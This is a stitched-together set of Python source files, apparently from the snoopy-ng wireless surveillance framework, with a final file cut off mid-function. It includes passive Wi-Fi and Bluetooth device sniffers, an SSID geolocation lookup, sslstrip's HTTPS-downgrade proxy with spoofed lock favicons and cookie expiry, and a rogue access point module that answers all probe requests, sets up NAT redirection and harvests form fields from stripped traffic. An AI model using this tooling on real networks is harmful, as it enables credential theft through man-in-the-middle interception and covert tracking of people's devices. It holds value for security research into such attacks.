    tmp = []
    st = 0
    i = str.find('"',st)
    while i > 0:
        tmp.extend(str[st:i-1].strip().split(" "))
        j = str.find('"', i+1)
        if j < 1:
            return
        tmp.append(str[i+1:j])
        st = j+1
        i = str.find('"',st)
    tmp.extend(str[st:].strip().split(" "))
    return tmp

def run_program(rcmd):
    """
    Runs a program 'executable' with list of paramters 'executable_options'. Returns the process, or None if failed. Use:
        proc.poll() to check if it's running (0 = running)
        proc.kill() to kill the process
    """

    logging.debug("Running command '%s'"%rcmd)
    cmd = splitz(rcmd)
    if not cmd:
        logging.error("Bad command '%s'" %rcmd)
        return
    executable = cmd[0]
    executable_options=cmd[1:]

    try:
        proc  = Popen(([executable] + executable_options), stdout=PIPE, stderr=PIPE)
        #response = proc.communicate()
        #response_stdout, response_stderr = response[0], response[1]
    except OSError, e:
        if e.errno == errno.ENOENT:
            logging.error( "Unable to locate '%s' program. Is it in your path?" % executable )
        else:
            logging.error( "O/S error occured when trying to run '%s': \"%s\"" % (executable, str(e)) )
    except ValueError, e:
        logging.error( "Value error occured. Check your parameters." )
    else:
        return proc

if __name__ == "__main__":
    """Careful, main program will block"""
    proc = run_program(sys.argv[1])
    response = proc.communicate()
    response_stdout, response_stderr = response[0], response[1]
    if proc.wait() != 0:    
        print "Program returned with the error: \"%s\"" %(response_stderr)
        sys.exit(-1) 
    else:
        print "Program returned successfully. First line of response was \"%s\"" %(response_stdout.split('\n')[0] )
        print response_stdout



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import re
from sqlalchemy import MetaData, Table, Column, Integer, String, Unicode, DateTime
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import Dot11Beacon, Dot11Elt
from base64 import b64encode
from includes.common import snoop_hash, printFreq 
import os
from includes.fonts import *
from includes.prox import prox
from includes.fifoDict import fifoDict
import datetime
from includes.mac_vendor import mac_vendor

#N.B If you change b64mode to False, you should probably change
# the ssid colum to type Unicode.
b64mode = False

class Snarf():
    """Extract BSSIDs (i.e. Access Points)"""

    def __init__(self, **kwargs):

        self.hash_macs = kwargs.get('hash_macs', False)
        proxWindow = kwargs.get('proxWindow', 300)
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

        self.prox = prox(proxWindow=proxWindow, identName="mac", pulseName="num_beacons")
        self.ap_names = fifoDict()
        self.device_vendor = fifoDict()

        self.mv = mac_vendor()
        self.lastPrintUpdate = 0

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('wifi_AP_obs', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('first_obs', DateTime, primary_key=True, autoincrement=False),
                      Column('last_obs', DateTime),
                      Column('num_beacons', Integer),
                      Column('sunc', Integer, default=0))

        table2 = Table('wifi_AP_ssids', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('ssid', String(100), primary_key=True, autoincrement=False),
                      Column('sunc', Integer, default=0))

        return [table, table2]

    def proc_packet(self, p):
        if p.haslayer(Dot11Beacon) and p[Dot11Elt].info != '' and re.match("[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]", p.addr2):
            mac = re.sub(':', '', p.addr2)
            timeStamp = datetime.datetime.fromtimestamp(int(p.time))
            vendor = self.mv.lookup(mac[:6])
            if self.hash_macs == "True":
                mac = snoop_hash(mac)
            if b64mode:
                ssid = b64encode(p[Dot11Elt].info)
            else:
                ssid = p[Dot11Elt].info.decode('utf-8', 'ignore')
            try:
                sig_str = -(256-ord(p.notdecoded[-4:-3])) #TODO: Use signal strength
            except:
                logging.error("Unable to extract signal strength")
                logging.error(p.summary())

            self.prox.pulse(mac,timeStamp)
            self.ap_names.add((mac,ssid))
            self.device_vendor.add((mac,vendor))

    def get_data(self):
        proxSess = self.prox.getProxs()
        ap_names_rtn = []
        for mac_ssid in self.ap_names.getNew():
            mac,ssid = mac_ssid
            ap_names_rtn.append({"mac": mac, "ssid": ssid})

        vendors = []
        for mac_vendor in self.device_vendor.getNew():
            mac, vendor = mac_vendor
            vendorShort = vendor[0]
            vendorLong = vendor[1]
            vendors.append({"mac": mac, "vendor": vendorShort, "vendorLong": vendorLong})
                
        if proxSess and self.verb > 0 and abs(os.times()[4] - self.lastPrintUpdate) > printFreq:
            logging.info("Sub-plugin %s%s%s currently observing %s%d%s Access Points" % (GR,self.fname,G,GR,self.prox.getNumProxs(),G))
            self.lastPrintUpdate = os.times()[4]


        data = [("wifi_AP_obs", proxSess), ("wifi_AP_ssids", ap_names_rtn), ("vendors",vendors)]
        return data



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
from wigle_api import Wigle

logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')
illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    TRX = MaltegoTransform()
    TRX.parseArguments(sys.argv)
    #ssid = TRX.getVar("ssid")
    logging.debug(ssid)
    logging.debug(type(ssid))

    user = TRX.getVar("wigleUser")
    passw = TRX.getVar("wiglePass")
    email = TRX.getVar("wigleEmail")
    proxy = TRX.getVar("wigleProxy")

    if not user or not passw or not email:
        print "ERROR: Please supply Wigle credentials in the 'Property View' on the right --->"
        exit(-1)

    wig=Wigle(user, passw, email, proxy)
    if not wig.login():
        print "ERROR: Unable to login to Wigle with supplied wigle creds. Please check them."
        exit(-1)
    locations = wig.lookupSSID(ssid)
    if 'error' in locations:
        print "ERROR: Unable to query Wigle. Perhaps your IP/user is shunned. Error was '%s'" % locations
        exit(-1)

    for address in locations:
        if len(locations) > 20:
            break
        #ssid = b64decode(ssid)
        #ssid=escape(ssid)
        #ssid = illegal_xml_re.sub('', ssid)
        logging.debug(type(address))

        street_view_url1 = "http://maps.googleapis.com/maps/api/streetview?size=800x800&amp;sensor=false&amp;location=%s,%s" % (str(address['lat']),str(address['long']))
        street_view_url2 = "https://maps.google.com/maps?q=&layer=c&cbp=11,0,0,0,0&cbll=%s,%s " % (str(address['lat']),str(address['long']))
        map_url = "http://maps.google.com/maps?t=h&q=%s,%s"%(str(address['lat']),str(address['long']))
        flag_img = "http://www.geognos.com/api/en/countries/flag/%s.png" % str(address['code']).upper()

        #NewEnt=TRX.addEntity("maltego.Location", address['shortaddress'].encode('utf-8'))
        NewEnt=TRX.addEntity("snoopy.ssidLocation", address['shortaddress'].encode('utf-8'))
        NewEnt.addAdditionalFields("city","city", "strict", address['city'].encode('utf-8'))
        NewEnt.addAdditionalFields("countrycode","countrycode", "strict", address['code'].encode('utf-8'))
        NewEnt.addAdditionalFields("country","country", "strict", address['country'].encode('utf-8'))
        NewEnt.addAdditionalFields("lat","lat", "strict", str(address['lat']))
        NewEnt.addAdditionalFields("long","long", "strict", str(address['long']))
        NewEnt.addAdditionalFields("longaddress","longaddress", "strict", address['longaddress'].encode('utf-8'))
        NewEnt.addAdditionalFields("location.areacode","Area Code", "strict", address['postcode'])
        NewEnt.addAdditionalFields("road","Road", "strict", address['road'].encode('utf-8'))
        NewEnt.addAdditionalFields("streetaddress","streetaddress", "strict", address['shortaddress'].encode('utf-8'))
        NewEnt.addAdditionalFields("ssid","SSID", "strict", address['ssid'])
        NewEnt.addAdditionalFields("state","State", "strict", address['state'].encode('utf-8'))
        NewEnt.addAdditionalFields("area","Area", "strict", address['suburb'].encode('utf-8'))

        NewEnt.addAdditionalFields("googleMap", "Google map", "nostrict", map_url)
        NewEnt.addAdditionalFields("streetView", "Street View", "nostrict", street_view_url2)

        #NewEnt.setIconURL(flag_img)
        logging.debug(street_view_url1)
        NewEnt.setIconURL(street_view_url1)

        NewEnt.addDisplayInformation("<a href='%s'>Click for map </a>" % street_view_url2, "Street view")

    TRX.returnOutput()

main()



import subprocess
from datetime import datetime
from datetime import date
from includes.mac_vendor import mac_vendor
import logging

flag_do_sdp = False
mv = mac_vendor()

def scan():
        cmd_scan = "hcitool scan --info --class --flush"
        try:
            cmd_scan_out = subprocess.Popen(cmd_scan.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
        except Exception,e:
            logging.error("Unable to scan for Bluetooth devices: '%s'" %str(e))
        else:
            # parse scan results
            if len(cmd_scan_out[0]) > 16:
                devices = []
    
                for record in cmd_scan_out[0].split('\n\n')[1:-1]:
                    record = record.split('\n')
                    device = {'mac':'Unknown', 'vendor':'Unknown', 'vendorLong':'Unknown', 'name':'Unknown', 'classType':'Unknown','manufac':'Unknown','lmpVer':'Unknown'}         
     
                    try:
                        device['mac'] = mac = record[0][12:29:].replace(':','').lower()
                        device['vendor'], device['vendorLong'] = mv.lookup(mac[:6])
                        device['name'] = record[1][13:].replace('[cached]','') #name
                        device['classType'] = record[2][14:].replace("Device conforms to the ","") #class+type
        
                        if len(record)>3:
                            device['manufac'] = record[3][14:] # chip manufacturer
                            device['lmpVer'] = record[4][13:16:] # lmp ver
                    except Exception, e:
                        logging.warning("Trouble parsing Bluetooth output: %s" % str(e))
                
                    devices.append(device)
    
                    return devices

if __name__ == "__main__":
    print scan()



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import urlparse, logging, os, sys, random

from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient

from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory

from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache

class ClientRequest(Request):

    ''' This class represents incoming client requests and is essentially where
    the magic begins.  Here we remove the client headers we dont like, and then
    respond with either favicon spoofing, session denial, or proxy through HTTP
    or SSL to the server.
    '''    
    
    def __init__(self, channel, queued, reactor=reactor):
        Request.__init__(self, channel, queued)
        self.reactor       = reactor
        self.urlMonitor    = URLMonitor.getInstance()
        self.cookieCleaner = CookieCleaner.getInstance()
        self.dnsCache      = DnsCache.getInstance()
#        self.uniqueId      = random.randint(0, 10000)

    def cleanHeaders(self):
        headers = self.getAllHeaders().copy()

        if 'accept-encoding' in headers:
            del headers['accept-encoding']

        if 'if-modified-since' in headers:
            del headers['if-modified-since']

        if 'cache-control' in headers:
            del headers['cache-control']

        return headers

    def getPathFromUri(self):
        if (self.uri.find("http://") == 0):
            index = self.uri.find('/', 7)
            return self.uri[index:]

        return self.uri        

    def getPathToLockIcon(self):
        if os.path.exists("lock.ico"): return "lock.ico"

        scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
        scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")

        if os.path.exists(scriptPath): return scriptPath

        logging.warning("Client:%s Error: Could not find lock.ico" % (self.getClientIP()))
        return "lock.ico"        

    def handleHostResolvedSuccess(self, address):
        logging.debug("Client:%s Resolved host successfully: %s -> %s" % (self.getClientIP(), self.getHeader('host'), address))
        host              = self.getHeader("host")
        headers           = self.cleanHeaders()
        client            = self.getClientIP()
        path              = self.getPathFromUri()

        self.content.seek(0,0)
        postData          = self.content.read()
        url               = 'http://' + host + path

        self.dnsCache.cacheResolution(host, address)

        if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
            logging.debug("Client:%s Sending expired cookies..." % (self.getClientIP()))
            self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
                                                                                    host, headers, path))
        elif (self.urlMonitor.isSecureFavicon(client, path)):
            logging.debug("Client:%s Sending spoofed favicon response..." % (self.getClientIP()))
            self.sendSpoofedFaviconResponse()
        elif (self.urlMonitor.isSecureLink(client, url)):
            logging.debug("Client:%s Sending request via SSL..." % (self.getClientIP()))
            self.proxyViaSSL(address, self.method, path, postData, headers,
                             self.urlMonitor.getSecurePort(client, url))
        else:
            logging.debug("Client:%s Sending request via HTTP..." % (self.getClientIP()))
            self.proxyViaHTTP(address, self.method, path, postData, headers)

    def handleHostResolvedError(self, error):
        logging.warning("Client:%s Host resolution error: " + str(error) % (self.getClientIP()))
        self.finish()

    def resolveHost(self, host):
        address = self.dnsCache.getCachedAddress(host)

        if address != None:
            logging.debug("Client:%s Host cached." % (self.getClientIP()))
            return defer.succeed(address)
        else:
            logging.debug("Client:%s Host not cached." % (self.getClientIP()))
            return reactor.resolve(host)

    def process(self):
        logging.debug("Client:%s Resolving host: %s" % (self.getClientIP(), self.getHeader('host')))
        host     = self.getHeader('host')               
        deferred = self.resolveHost(host)

        deferred.addCallback(self.handleHostResolvedSuccess)
        deferred.addErrback(self.handleHostResolvedError)
        
    def proxyViaHTTP(self, host, method, path, postData, headers):
        connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
        connectionFactory.protocol = ServerConnection
        self.reactor.connectTCP(host, 80, connectionFactory)

    def proxyViaSSL(self, host, method, path, postData, headers, port):
        clientContextFactory       = ssl.ClientContextFactory()
        connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
        connectionFactory.protocol = SSLServerConnection
        self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)

    def sendExpiredCookies(self, host, path, expireHeaders):
        self.setResponseCode(302, "Moved")
        self.setHeader("Connection", "close")
        self.setHeader("Location", "http://" + host + path)
        
        for header in expireHeaders:
            self.setHeader("Set-Cookie", header)

        self.finish()        
        
    def sendSpoofedFaviconResponse(self):
        icoFile = open(self.getPathToLockIcon())

        self.setResponseCode(200, "OK")
        self.setHeader("Content-type", "image/x-icon")
        self.write(icoFile.read())
                
        icoFile.close()
        self.finish()



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import sqlalchemy as sa
from threading import Thread
import time
import os
from includes.fonts import *
#logging.basicConfig(level=logging.DEBUG)

class Snoop(Thread):
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        self.last_heartbeat = 0
        self.heartbeat_freq = 60 # Beat every n seconds
        self.verb = kwargs.get('verbose',0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

    def run(self):
        while self.RUN:
            time.sleep(2) #Nothing to do here
    def is_ready(self):
        """Indicates the module is ready, and loading of next module may commence."""
        return True

    def stop(self):
        """Perform operations required to stop module and return"""
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        """List of paramters that can be passed to the module, for user help output."""
        info = {"info" : "Returns a hearbeat every 60 seconds.",
                "parameter_list" : None
                }
        return info

    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        now = int(os.times()[4])
        if abs(now - self.last_heartbeat) > self.heartbeat_freq:
            timestamp = int(time.time())
            #logging.debug("Heartbeat - %d" % timestamp)
            self.last_heartbeat = now
            if self.verb > 0:
                logging.info("Plugin %s%s%s had a beat %s%s❤ %s%s" % (GR,self.fname,G,R,F,NF,G))
            return [('heartbeat',[{'timestamp':timestamp}])]
        else:
            return []

    @staticmethod
    def get_tables():
        """Return the table definitions for this module."""
        # Make sure to define your table here. Ensure you have a 'sunc' column:
        metadata = sa.MetaData()
        table = sa.Table('heartbeat',metadata,
                              #sa.Column('drone', sa.String(length=20)),
                              sa.Column('timestamp', sa.Integer, primary_key=True, autoincrement=False),
                              sa.Column('sunc', sa.Integer, default=0))
        return [table]


if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
import json
import time

from OpenSSL import SSL
from flask import Flask, request, Response, abort
from functools import wraps
from sqlalchemy import create_engine, MetaData, Table, Column, String,\
                   select, and_, Integer
from collections import deque
from sqlalchemy.exc import *
from datetime import datetime
from auth_handler import auth
from includes.jsonify import json_to_objs, objs_to_json
from includes.common import get_tables, create_tables
from includes.fonts import *

log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

path="/"

app = Flask(__name__)
auth_ = None #auth()
server_data = deque(maxlen=100000)

def write_local_db(rawdata):
    """Write server db"""
    for entry in rawdata:
        tbl = entry['table']
        data = entry['data']
        if tbl not in metadata.tables.keys():
            logging.error("Error: Drone attempting to insert data into invalid table '%s'"%tbl)
            return False
        tbl=metadata.tables[tbl]
        try:
            tbl.insert().execute(data)
        except Exception,e:
             logging.exception(e)
             return False
    return True

def authenticate():
    """Sends a 401 response that enables basic auth"""
    return Response(
    'Could not verify your access level for that URL.\n'
    'You have to login with proper credentials', 401,
    {'WWW-Authenticate': 'Basic realm="Login Required"'})

def requires_admin_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        auth = request.authorization
        if not auth or not verify_admin(auth.username, auth.password):
            return authenticate()
        return f(*args, **kwargs)
    return decorated

def requires_auth(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        auth = request.authorization
        if not auth or not auth_.verify_account(auth.username, auth.password):
            return authenticate()
        return f(*args, **kwargs)
    return decorated

def unpack_data(request):
    if request.headers['Content-Type'] == 'application/json':
       try:
           return json.loads(request.data)
       except Exception,e:
           logging.error(e)

@app.route("/pull/", methods=['GET'])
@requires_auth
def pull():
    global tables
    global metadata
    metadata.reflect()
    all_data = []
    for table in tables:
        if "sunc" in table.c:
            table.metadata = metadata
            query = table.select()
            ex = query.execute()
            results = ex.fetchall()
            if results:
                result_as_dict = [dict(e) for e in results]
                data_to_return = {"table": table.name,
                                               "data": result_as_dict}
                data_to_return = json.loads(objs_to_json(data_to_return)) # A bit backward, ne
                all_data.append(data_to_return)

    #return type(json.dumps(str(all_data))
    return json.dumps(all_data)


# For the collection of data
@app.route(path, methods=['POST'])
@requires_auth
def catch_data():
    if request.headers['Content-Type'] == 'application/json':
        try:
            jsdata = json_to_objs(request.data)
        except Exception,e:
            logging.error("Unable to parse JSON from '%s'" % request)
            return '{"result":"failure", "reason":"Check server logs"}'
        else:
            server_type = os.getenv('SNOOPY_SERVER', 'flask')
            if server_type == 'apache':
                write_local_db([jsdata])
            else:
                server_data.append((jsdata['table'], jsdata['data']))
    else:
        logging.error("Unable to parse JSON from '%s'" % request)
        return '{"result":"failure", "reason":"Check server logs"}'

    return '{"result":"success", "reason":"Check server logs"}'

def poll_data():
        rtnData=[]
        while server_data:
            rtnData.append(server_data.popleft())
        if rtnData:
            return rtnData
        else:
            return []

def prep(dbms="sqlite:///snoopy.db"):
    global db
    global tables
    global metadata
    db=create_engine(dbms)
    db.debug=True
    create_tables(db)
    tables = get_tables()
    metadata = MetaData(db)
    metadata.reflect()

def run_webserver(port=9001,ip="0.0.0.0",cert=None,key=None,_db=None):
    #create_db_tables()
    global db
    global tables
    global metadata
    global auth_

    auth_ = auth(rawdb=_db)
    db = _db
    if not _db:
        dbms="sqlite:///snoopy.db"
        db=create_engine(dbms)
    tables = get_tables()
    metadata = MetaData(db)

    ssl_context=None
    if cert and key:
        ssl_context=SSL.Context(SSL.TLSv1_2_METHOD)
        ssl_context.use_privatekey_file(key)
        ssl_context.use_certificate_file(cert)

    app.run(host=ip, port=port, ssl_context=ssl_context)

if __name__ == "__main__":
    run_webserver()



from run_prog import run_program
import time
import netifaces
import logging
import sys
import includes.monitor_mode as mm
from collections import deque
import pyinotify
import os
from includes.fonts import *
from dateutil import parser
import urlparse
import re

class EventHandler(pyinotify.ProcessEvent):
    def process_IN_MODIFY(self, event):
        if os.path.basename(event.path) == "dhcpd.leases":
            self.someInstance.check_new_leases()
        elif os.path.basename(event.path) == "sslstrip.log":
            self.someInstance.check_sslstrip()

class rogueAP:
    """Create a rogue access point"""
    def __init__(self, **kwargs):

        self.ssid = kwargs.get("ssid", "FreeInternet")
        self.wlan_iface = kwargs.get("wlan_iface", "mon0")    # If none, will use first wlan capable of injection
        self.net_iface = kwargs.get("net_iface", "eth0")    # iface with outbound internet access
        self.enable_mon = kwargs.get("enable_mon", False)   # airmon-ng start <wlan_iface> 
        self.promisc =   kwargs.get("promisc", False)       # Answer all probe requests
        self.do_sslstrip = kwargs.get("sslstrip", False)
        self.rogueif = kwargs.get("rogueif", "wlan5")       # Answer all probe requests
        self.hostapd = kwargs.get("hostapd", False)       # Use hostapd instead of airbase-ng
        self.hapdconf = kwargs.get("hapdconf", "/etc/hostapd.conf")       # Config file to use for hostapd
        self.hapdcmd = kwargs.get("hapdcmd", "/root/hostapd/2.1-karmaian/hostapd/hostapd")       # Binary to use for hostapd

        self.procs = {} #Var to hold external processes, and ensure they keep running
        self.num_procs = 2 # How many procs should be run
        self.verb = kwargs.get('verbose', 0)

        self.already_seen={}
        self.new_leases = deque()
        self.ssl_strip_data = deque()

        if self.do_sslstrip == "True":
            self.do_sslstrip = True
            #self.num_procs += 1
        else:
            self.do_sslstrip = False
        if self.promisc == "True":
            self.promisc = True
        else:
            self.promisc = False
        if self.enable_mon == "True":
            self.enable_mon = True
        else:
            self.enable_mon = False
        if self.hostapd == "True":
            self.hostapd = True
        else:
            self.hostapd = False

        if self.enable_mon:
            self.wlan_iface=mm.enable_monitor_mode(self.wlan_iface)

        if not self.wlan_iface:
            logging.error("No wlan_iface specified for rogueAP :(")
            if not self.hostapd:
                sys.exit(-1)        
        if self.hostapd:
            airb_opts = [self.hapdconf]    
            self.airb_cmd = [self.hapdcmd] + airb_opts
            self.rogueif = self.wlan_iface
        else:
            self.rogueif = "at0"
            if self.promisc:    
                airb_opts = ['-e', self.ssid, '-P', self.wlan_iface]
            else:
                airb_opts = ['-e', self.ssid, self.wlan_iface]
            self.airb_cmd = ['airbase-ng'] + airb_opts

        self.airb_cmd = " ".join(self.airb_cmd)      
        self.set_ip_cmd = "ifconfig "+self.rogueif+" up 10.0.0.1 netmask 255.255.255.0"
        hapd_config_file ="""
interface="""+self.rogueif+"""
bssid=00:11:22:33:44:00
driver=nl80211
ssid="""+self.ssid+"""
channel=6
disassoc_low_ack=0
auth_algs=3
ignore_broadcast_ssid=0
logger_syslog=-1
logger_stdout=-1
logger_syslog_level=1
logger_stdout_level=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
macaddr_acl=0
enable_karma=1
"""
        f=open('/etc/hostapd.conf', 'w')
        f.write(hapd_config_file)
        f.close()
        
        # Vars for DHCP server
        config_file ="""
dhcp-range=10.0.0.2,10.0.0.100,255.255.255.0,8765h
dhcp-option=3,10.0.0.1
dhcp-option=6,8.8.8.8
dhcp-leasefile=/etc/dhcpd.leases
"""
        f=open('/etc/dnsmasq.conf', 'w')
        f.write(config_file)
        f.close()
        self.launch_dhcp = "dnsmasq -d -a 10.0.0.1 -i "+self.rogueif+" -C /etc/dnsmasq.conf"

        # Monitor dhcpd.lease file for updates
        with file("/etc/dhcpd.leases", 'a'):
            os.utime("/etc/dhcpd.leases", None)

        # Monitor dhcpd.lease file for updates
        with file("/tmp/sslstrip.log", 'a'):
            os.utime("/tmp/sslstrip.log", None)

        wm = pyinotify.WatchManager() # Watch Manager
        wdd = wm.add_watch(['/etc/dhcpd.leases', '/tmp/sslstrip.log'], pyinotify.IN_MODIFY, rec=True)

        handler = EventHandler()
        handler.someInstance = self

        self.notifier = pyinotify.ThreadedNotifier(wm, handler)
        self.notifier.start()

        # SSL Strip
        self.launch_sslstrip = "sslstrip_snoopy -w /tmp/sslstrip.log -f"
        self.fo_ssl = open("/tmp/sslstrip.log", "r")

        if self.do_sslstrip:
            self.run_sslstrip()

    def run_ap(self):
        run_program("killall airbase-ng hostapd")
        time.sleep(4)

        # Make sure interface exists
        if self.wlan_iface not in netifaces.interfaces():
            logging.error("No such interface: '%s'" % self.wlan_iface)
            if not self.hostapd:
                return False
        proc = run_program(self.airb_cmd)
        if proc.poll():
            logging.error("Airbase has terminated. Cannot continue.")
            return False

        # Wait for airbase self.rogueif interface to come up
        while self.rogueif not in netifaces.interfaces(): #Should add a timeout
            logging.debug("Waiting for airbase interface to come up.")
            time.sleep(1)

        self.procs['airbase'] = proc
        logging.debug("Airbase interface is up. Setting IP...")
        run_program(self.set_ip_cmd)

        # Wait for IP to be set
        ipSet = False
        while not ipSet:
            try:
                if netifaces.ifaddresses(self.rogueif)[2][0]['addr']:
                    ipSet = True
            except Exception:
                time.sleep(2)
                pass

        logging.info("IP address for access point has been set.")
        return True
       
    def run_dhcpd(self):
        run_program("killall dnsmasq")
        time.sleep(3)
        proc = run_program(self.launch_dhcp)
        if proc.poll():
            response = proc.communicate()
            response_stdout, response_stderr = response[0], response[1]
            if response_stderr:
                logging.error(response_stderr)
            else:
                logging.error("Unable to launch dhcp server.")
                return False
        self.procs['dhcp'] = proc
        return True

    def run_sslstrip(self):
        run_program("killall sslstrip")
        time.sleep(2)
        proc = run_program(self.launch_sslstrip)
        if proc.poll():
            response = proc.communicate()
            response_stdout, response_stderr = response[0], response[1]
            if response_stderr:
                logging.error(response_stderr)
            else:
                logging.error("Unable to launch sslstrip.")
                return False
        self.procs['sslstrip'] = proc
        return True

    def check_new_leases(self):
        try:
            lines = [line.strip() for line in open('/etc/dhcpd.leases')]
        except Exception, e:
            logging.warning("Unable to open DHCP lease file. It's probably waiting to be created")
            return
        for line in lines:
            try:
                line = line.split()
                ltime, mac, ip = line[0], line[1], line[2]
                mac = re.sub(':', '', mac)
                hostname = " ".join(line[3:-1])
                if mac not in self.already_seen:
                    self.new_leases.append({'mac':mac, 'leasetime':ltime, 'ip':ip, 'hostname':hostname})
                    self.already_seen[mac] = 1
                    if self.verb > 0:
                        logging.info("New %sDHCP lease%s handed out to %s%s (%s)%s" % (GR,G,GR,mac,hostname,G))
            except Exception,e:
                logging.error("Badly formed DHCP lease - '%s'" % line)

    def get_new_leases(self):
        #self.__check_new_leases()
        rtnData=[]
        while self.new_leases:
            rtnData.append(self.new_leases.popleft())
        if rtnData:
            return [("dhcp_leases", rtnData)]
        else:
            return []

    def do_nat(self):
        # Handle NAT
        ipt = ['iptables -F', 'iptables -F -t nat', 'iptables -t nat -A POSTROUTING -o %s -j MASQUERADE'%self.net_iface,  'iptables -A FORWARD -i '+self.rogueif+' -o %s -j ACCEPT'%self.net_iface]
        if self.do_sslstrip:
            ipt.insert(2, 'iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')
        for rule in ipt:
            run_program(rule)
        run_program("sysctl -w net.ipv4.ip_forward=1")


    def get_ssl_data(self):
        rtnData=[]
        while self.ssl_strip_data:
            rtnData.append(self.ssl_strip_data.popleft())
        if rtnData: 
            return [("sslstrip", rtnData)]
        else:
            return []

    def check_sslstrip(self):
        # Format when reading should be:
        # First line: DATE, SIZE, SECURE, METHOD Data (<site>)
        # Next line: key=val&key=val
        lines = self.fo_ssl.readlines()
        for l_num in range (len(lines)):
            line = lines[l_num]
            if "," in line:
                try:
                    date = parser.parse( line.split(",")[0] )
                    domain = re.search("\((.*?)\)",line).group(1)
                    client = re.search("Client:(.*?) ",line).group(1)
                    url = re.search("URL\((.*)\)URL:",line).group(1)
                except Exception, e:
                    logging.error("%s%sUnable to parse sslstrip.log. Are you using the SensePost version?%s%s" % (F,R,G,NF))
                    logging.error(e)
                else:
                    l_num+=1
                    data = lines[l_num]
                    data = dict(urlparse.parse_qsl(data.rstrip()))
                    if self.verb > 0:
                        logging.info("New %ssslstrip%s data for domain %s%s%s" % (GR,G,GR,domain,G))
                    for key, val in data.iteritems():
                        self.ssl_strip_data.append({'date': date, 'key' : key, 'value':val, 'client':client, 'url':url, 'domain':domain})

    def all_OK(self):
        # Ensure DHCP + AP remain up.
        if len(self.procs) < self.num_procs:
            return False # Still starting up
        for name, proc in self.procs.iteritems():
            if proc.poll():
                logging.error("Process for %s has died, cannot continue. Sorry." % name) 
                return False
        return True

    def shutdown(self):
        #Kill kill kill
        self.notifier.stop()
        run_program("killall airbase-ng")
        run_program("killall hostapd")
        run_program("killall dnsmasq")
        run_program("killall sslstrip")
        run_program("iptables -F")
        run_program("iptables -F -t nat")
        run_program("sysctl -w net.ipv4.ip_forward=0")
        os.remove("/etc/dhcpd.leases")
        os.remove("/tmp/sslstrip.log")



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
    filters = []
